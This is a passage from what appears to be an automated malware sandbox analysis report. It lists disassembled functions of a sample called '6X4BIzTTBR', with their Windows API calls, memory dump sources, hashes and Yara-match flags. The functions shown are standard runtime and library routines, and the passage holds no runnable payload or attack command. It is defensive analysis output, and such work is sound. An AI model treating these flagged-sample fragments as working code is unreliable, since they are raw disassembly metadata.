                                                      • __freea.LIBCMT ref: 00432359
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 3864826663-0
                                                      • Opcode ID: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                      • Instruction ID: f7233cfb18756418db21c11bcc2c8e0fe6e8002e1dcf582c165aec8b448a06b4
                                                      • Opcode Fuzzy Hash: fc5e23a9969f5a0b3c987a42f5ffda192cc55ac5853a9877383f7c3e4280cf28
                                                      • Instruction Fuzzy Hash: A8512432600216AFDB258F71CD41EBF77A9EB48B54F14526AFD04E6280EBBCDD40C698
                                                      Function 00439EBE Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                      • Instruction ID: 3880426677173abbed0f82bf47eb0a29bbee263204947e67d521e7754b09f7f0
                                                      • Opcode Fuzzy Hash: 1c3dc1b9d9b3fad286da187fe857a54df99b30e252b8950e3012847a3cb02415
                                                      • Instruction Fuzzy Hash: 6C61E371900205AFDB24DF65C842BAEBBF4EF09310F1451AFE894EB392D7399D418B99
                                                      Function 0470A125 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                      • Instruction ID: 1f77944d06082f767374f441c4d4446cefa220c4a1b48c1bb5ed6cb744d1599e
                                                      • Opcode Fuzzy Hash: 30d23d355d895f70cd8acfb134f092bcee01e0337bd1769fb6490f5a84f9f64a
                                                      • Instruction Fuzzy Hash: 2461AF71A02305EFEB20DF68C941B9ABBF4EB59714F14817AED44EB381E732A9419B50
                                                      Function 00433893 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(?,0042C24D,E0830C40,?,?,?,?,?,?,00434008,0040DDEB,0042C24D,?,0042C24D,0042C24D,0040DDEB), ref: 004338D5
                                                      • __fassign.LIBCMT ref: 00433950
                                                      • __fassign.LIBCMT ref: 0043396B
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,0042C24D,00000001,?,00000005,00000000,00000000), ref: 00433991
                                                      • WriteFile.KERNEL32(?,?,00000000,00434008,00000000,?,?,?,?,?,?,?,?,?,00434008,0040DDEB), ref: 004339B0
                                                      • WriteFile.KERNEL32(?,0040DDEB,00000001,00434008,00000000,?,?,?,?,?,?,?,?,?,00434008,0040DDEB), ref: 004339E9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                      • Instruction ID: 8c98482b7363d9b7a2856aa464f0f17ba8f66f594d3c239b4ce77d00e47267ce
                                                      • Opcode Fuzzy Hash: d6e4a050a64bfb7ccc6b009322825ab70381fc19e65649eea91823c2b0319e50
                                                      • Instruction Fuzzy Hash: A751D2B0E00249AFDB10DFA8D881BEEBBF4EF09311F14412BE556E7291D7749A41CB69
                                                      Function 04703AFA Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetConsoleCP.KERNEL32(?,046FC4B4,E0830C40,?,?,?,?,?,?,0470426F,046DE052,046FC4B4,?,046FC4B4,046FC4B4,046DE052), ref: 04703B3C
                                                      • __fassign.LIBCMT ref: 04703BB7
                                                      • __fassign.LIBCMT ref: 04703BD2
                                                      • WideCharToMultiByte.KERNEL32(?,00000000,046FC4B4,00000001,?,00000005,00000000,00000000), ref: 04703BF8
                                                      • WriteFile.KERNEL32(?,?,00000000,0470426F,00000000,?,?,?,?,?,?,?,?,?,0470426F,046DE052), ref: 04703C17
                                                      • WriteFile.KERNEL32(?,046DE052,00000001,0470426F,00000000,?,?,?,?,?,?,?,?,?,0470426F,046DE052), ref: 04703C50
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                      • String ID:
                                                      • API String ID: 1324828854-0
                                                      • Opcode ID: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                      • Instruction ID: d2499ce698665b88352d8150edbd06b60f5e7c9d2070ea61630fcf0a92e1e5d4
                                                      • Opcode Fuzzy Hash: e6aa7f8e09cc3bdd419a993f0e627323657b2fb42e9cf7c9360fe368da63a324
                                                      • Instruction Fuzzy Hash: D651D674A01209EFDB10CFA8D888AEEBBF4EF09700F15851AE955E73D1E730A955CB64
                                                      Function 046EB13D Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _SpinWait.LIBCONCRT ref: 046EB162
                                                        • Part of subcall function 046E1198: _SpinWait.LIBCONCRT ref: 046E11B0
                                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 046EB176
                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 046EB1A8
                                                      • List.LIBCMT ref: 046EB22B
                                                      • List.LIBCMT ref: 046EB23A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                      • String ID: &+A
                                                      • API String ID: 3281396844-3022679855
                                                      • Opcode ID: a702d5991f5cc7149a24a86390a7b934e26dc465f4abd9ece5b58599af1ffa23
                                                      • Instruction ID: 3f267437aae8e86de638d32e193a912d4b224868e59a35af8c1ba95950734c6c
                                                      • Opcode Fuzzy Hash: a702d5991f5cc7149a24a86390a7b934e26dc465f4abd9ece5b58599af1ffa23
                                                      • Instruction Fuzzy Hash: E3318831A02656DFDB14EFA6C5906FDB7F0BF05B18F04006EC8416B251EB727904CB98
                                                      Function 0043F951 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                      • Instruction ID: 911517836775829f1f0f495c823dc359ab1313930e1a31c9a79f2c9c58edb12b
                                                      • Opcode Fuzzy Hash: 26fd24188a083ade74c1b847c8e385b80c443176beafc5e0d5befa98fb89b42a
                                                      • Instruction Fuzzy Hash: 4C112772A00215BFC7203F77AC04F6B7A6CEF8A725F10123BF815D3341DA3889049269
                                                      Function 0470FBB8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                      • Instruction ID: ba09d6e0135593509ac972da153ce5c013711dbd09e4059f5980ee60cf1f9450
                                                      • Opcode Fuzzy Hash: 32159607c4063c2e90e18d1ced7cd03c6b33762cae1000625b4156809b17c3e4
                                                      • Instruction Fuzzy Hash: F2110672606214FFEB306F72DC4896B3AECEF82724B108629FC15D7390EA71A804C664
                                                      Function 0043A393 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0043A0DA: _free.LIBCMT ref: 0043A103
                                                      • _free.LIBCMT ref: 0043A3E1
                                                        • Part of subcall function 0043347A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?), ref: 00433490
                                                        • Part of subcall function 0043347A: GetLastError.KERNEL32(?,?,0043A108,?,00000000,?,00000000,?,0043A3AC,?,00000007,?,?,0043A7A0,?,?), ref: 004334A2
                                                      • _free.LIBCMT ref: 0043A3EC
                                                      • _free.LIBCMT ref: 0043A3F7
                                                      • _free.LIBCMT ref: 0043A44B
                                                      • _free.LIBCMT ref: 0043A456
                                                      • _free.LIBCMT ref: 0043A461
                                                      • _free.LIBCMT ref: 0043A46C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                      • Instruction ID: bf2b5824ba8fe7ccd3aa20c0db96b829e97de71ed8586692ff537644c7358fa4
                                                      • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                      • Instruction Fuzzy Hash: 1C11AF33580B04AAD931BFB2CC07FCB77AC6F18305F40581EB6EA76192CA2DB5109746
                                                      Function 0470A5FA Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 0470A341: _free.LIBCMT ref: 0470A36A
                                                      • _free.LIBCMT ref: 0470A648
                                                        • Part of subcall function 047036E1: HeapFree.KERNEL32(00000000,00000000,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?), ref: 047036F7
                                                        • Part of subcall function 047036E1: GetLastError.KERNEL32(?,?,0470A36F,?,00000000,?,00000000,?,0470A613,?,00000007,?,?,0470AA07,?,?), ref: 04703709
                                                      • _free.LIBCMT ref: 0470A653
                                                      • _free.LIBCMT ref: 0470A65E
                                                      • _free.LIBCMT ref: 0470A6B2
                                                      • _free.LIBCMT ref: 0470A6BD
                                                      • _free.LIBCMT ref: 0470A6C8
                                                      • _free.LIBCMT ref: 0470A6D3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast
                                                      • String ID:
                                                      • API String ID: 776569668-0
                                                      • Opcode ID: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                      • Instruction ID: ece5ff10396963fc2fe79f96d9176e9ef6fa33897fd431b7b4f39b08b0a9a510
                                                      • Opcode Fuzzy Hash: b7590f4111be71bf3afae53295ff9af9b533932b666efaf04c0ab8a9c80b4b90
                                                      • Instruction Fuzzy Hash: 81118171542F04EBE920B7B1CC4DFCBB7DCDF01708F408A14A699A63D0DAB6B5545650
                                                      Function 00412402 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412410
                                                      • GetLastError.KERNEL32 ref: 00412416
                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 00412443
                                                      • GetLastError.KERNEL32 ref: 0041244D
                                                      • GetLastError.KERNEL32 ref: 0041245F
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412475
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00412483
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                      • String ID:
                                                      • API String ID: 4227777306-0
                                                      • Opcode ID: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                      • Instruction ID: 65bc4c89bc166e9a91a801661d5392fc9f10abb9af920915c97cd1159a2059f3
                                                      • Opcode Fuzzy Hash: ba26f486df76d842dabe37b99459d44fccdc07bc3ddf0c1636ffc481c0617ea2
                                                      • Instruction Fuzzy Hash: 01017038600011A7C710AF61ED05FEF376CEF42B52B50042BF505D3151DBACD954866D
                                                      Function 046E2669 Relevance: 10.6, APIs: 7, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 046E2677
                                                      • GetLastError.KERNEL32 ref: 046E267D
                                                      • GetLogicalProcessorInformation.KERNEL32(00000000,?), ref: 046E26AA
                                                      • GetLastError.KERNEL32 ref: 046E26B4
                                                      • GetLastError.KERNEL32 ref: 046E26C6
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E26DC
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E26EA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InformationLogicalProcessor$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                      • String ID:
                                                      • API String ID: 4227777306-0
                                                      • Opcode ID: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                      • Instruction ID: 1d567ab31e5984373cdb3413795ba08a70ccd79209821ead8d49c6f11f1f2bdc
                                                      • Opcode Fuzzy Hash: 6bc3ccd81d67fd1a20a10fcda5f24da638e68139e84298e1693e69c500751e62
                                                      • Instruction Fuzzy Hash: 59014C34702119E7EB10BF62DC08BBF37ADAF42A51B100669F001D3150FB20F50487AC
                                                      Function 046E24B4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,046E671B), ref: 046E24C6
                                                      • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 046E24D4
                                                      • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 046E24E2
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,046E671B), ref: 046E2510
                                                      • GetProcAddress.KERNEL32(00000000), ref: 046E2517
                                                      • GetLastError.KERNEL32(?,?,?,046E671B), ref: 046E2532
                                                      • GetLastError.KERNEL32(?,?,?,046E671B), ref: 046E253E
                                                      • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 046E2554
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046E2562
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                      • String ID: kernel32.dll
                                                      • API String ID: 4179531150-1793498882
                                                      • Opcode ID: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                      • Instruction ID: 539b940d03f5c036ee15da3e71d874dd3418307f576a2b12500499311fb80b7d
                                                      • Opcode Fuzzy Hash: 44ecf9bd0dd5c91555fe9cdf304f14bfeeea195f7c9b597a93ca8c7b2ae1de14
                                                      • Instruction Fuzzy Hash: B0F0D1769123103FB6103B7A7D9D82A3EEDDD56A22320066AF412D2291FB34AA00866C
                                                      Function 0042FEF4 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FEA5,00000003,?,0042FE45,00000003,00457970,0000000C,0042FF9C,00000003,00000002), ref: 0042FF14
                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF27
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0042FEA5,00000003,?,0042FE45,00000003,00457970,0000000C,0042FF9C,00000003,00000002,00000000), ref: 0042FF4A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: "1@$CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-4179296187
                                                      • Opcode ID: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                      • Instruction ID: d60dd429fcd1d8a997d810f584a2a414c89b853b4e03cec3e2f3c9fad185977b
                                                      • Opcode Fuzzy Hash: d200b2febff7f97f8a2c3bc9b8f7fbb30bc0a4b2d93706d62895116e71432848
                                                      • Instruction Fuzzy Hash: 6AF0C830A00219BBDB119F50DD09B9EBFB4EF05B12F5100B6F905B2290CB799E44DA4C
                                                      Function 047023AB Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,047025FC,00000001,00000001,?), ref: 04702405
                                                      • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,047025FC,00000001,00000001,?,?,?,?), ref: 0470248B
                                                      • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 04702585
                                                      • __freea.LIBCMT ref: 04702592
                                                        • Part of subcall function 0470391E: RtlAllocateHeap.NTDLL(00000000,046DDAED,00000000), ref: 04703950
                                                      • __freea.LIBCMT ref: 0470259B
                                                      • __freea.LIBCMT ref: 047025C0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1414292761-0
                                                      • Opcode ID: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                      • Instruction ID: ef7f9df01b44768060b27888b004e6d3e3a0d87db2662eef604890b65c79866c
                                                      • Opcode Fuzzy Hash: 011fbe7e6b9632404c7d9c1a6e466163715f947e1f03c273384449d8668b7b41
                                                      • Instruction Fuzzy Hash: B851D273601216EBEB258F64CC58EBE77E9EB48754F2586A8FC04E6281EB34FC40C654
                                                      Function 046FE429 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __cftoe
                                                      • String ID:
                                                      • API String ID: 4189289331-0
                                                      • Opcode ID: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                      • Instruction ID: a6868844fc0e59c45370a21c37bd4e4667a9c99832b586a95a348d00afa15710
                                                      • Opcode Fuzzy Hash: f585e4267acc06fdc3d0dd0e71bd3e0fb416072b74251e024126f50d702bbe84
                                                      • Instruction Fuzzy Hash: ED51E972900205ABEF209F68CC44FAE7BA9AF59334F14421DEA55D63E1FB37F9018664
                                                      Function 046D544D Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                      • String ID:
                                                      • API String ID: 1687354797-0
                                                      • Opcode ID: 9bbf6c831fd912da87baf57c36a4887fcd0ef6c58bda06b470faafc8a7fe9ad1
                                                      • Instruction ID: 8bfdb4cb9171e4105d4bd6ab79f7eecef5b7913d76f1a314fb5348e78e8f966f
                                                      • Opcode Fuzzy Hash: 9bbf6c831fd912da87baf57c36a4887fcd0ef6c58bda06b470faafc8a7fe9ad1
                                                      • Instruction Fuzzy Hash: 4C218671C04359AAEF11FBB8D844BDD77F8AF09319F14401EE410B7281FB75A9448B69
                                                      Function 00428DEA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,00428DE1,00426772,004406B0,00000008,00440A15,?,?,?,?,00423A5B,?,?,3131EDE3), ref: 00428DF8
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00428E06
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00428E1F
                                                      • SetLastError.KERNEL32(00000000,?,00428DE1,00426772,004406B0,00000008,00440A15,?,?,?,?,00423A5B,?,?,3131EDE3), ref: 00428E71
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                      • Instruction ID: 7ad4f0df2e9502dcbdb31cfe788d2cf5650d8737248d5a652805d173a05f68b7
                                                      • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                      • Instruction Fuzzy Hash: 5A01283230A7316EA6242BF57C8952F2744EB15B79B60033FF510903E2EE194C21954D
                                                      Function 046F9051 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,046F9048,046F69D9,04710917,00000008,04710C7C,?,?,?,?,046F3CC2,?,?,0045A064), ref: 046F905F
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 046F906D
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 046F9086
                                                      • SetLastError.KERNEL32(00000000,?,046F9048,046F69D9,04710917,00000008,04710C7C,?,?,?,?,046F3CC2,?,?,0045A064), ref: 046F90D8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                      • Instruction ID: 242861dd73e770d2cfd2408ef551b67792f7009f8126331dc4079bff31317f42
                                                      • Opcode Fuzzy Hash: 8d1e64815291ccecef70542e2d255c056134f94d90ba3e9ee2a9f16b5b247f0d
                                                      • Instruction Fuzzy Hash: AF01F7723097116EB7342BF5BC88A262744EB05779B20033EEBA4453E1FF12A819555D
                                                      Function 00404D68 Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00404D79
                                                      • int.LIBCPMT ref: 00404D90
                                                        • Part of subcall function 0040BD72: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD83
                                                        • Part of subcall function 0040BD72: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD9D
                                                      • std::locale::_Getfacet.LIBCPMT ref: 00404D99
                                                      • std::_Facet_Register.LIBCPMT ref: 00404DCA
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00404DE0
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00404DFE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                      • String ID:
                                                      • API String ID: 2243866535-0
                                                      • Opcode ID: dc8cc55967415f6a0fc2e567eb5e501cce76001588e3bd73c4b830a1ca651174
                                                      • Instruction ID: efd59a8a4ce5531e7078d737fa0b9be6b6b0d650fdb19138902b4e8de58bbbfd
                                                      • Opcode Fuzzy Hash: dc8cc55967415f6a0fc2e567eb5e501cce76001588e3bd73c4b830a1ca651174
                                                      • Instruction Fuzzy Hash: DF119E719101189BCB15EBA1C841AEE7774AF80319F14053FE5127B2D2DB3C9A05CB9D
                                                      Function 046D4FCF Relevance: 9.1, APIs: 6, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 046D4FE0
                                                      • int.LIBCPMT ref: 046D4FF7
                                                        • Part of subcall function 046DBFD9: std::_Lockit::_Lockit.LIBCPMT ref: 046DBFEA
                                                        • Part of subcall function 046DBFD9: std::_Lockit::~_Lockit.LIBCPMT ref: 046DC004
                                                      • std::locale::_Getfacet.LIBCPMT ref: 046D5000
                                                      • std::_Facet_Register.LIBCPMT ref: 046D5031
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 046D5047
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 046D5065
                                                      Memory Dump Source
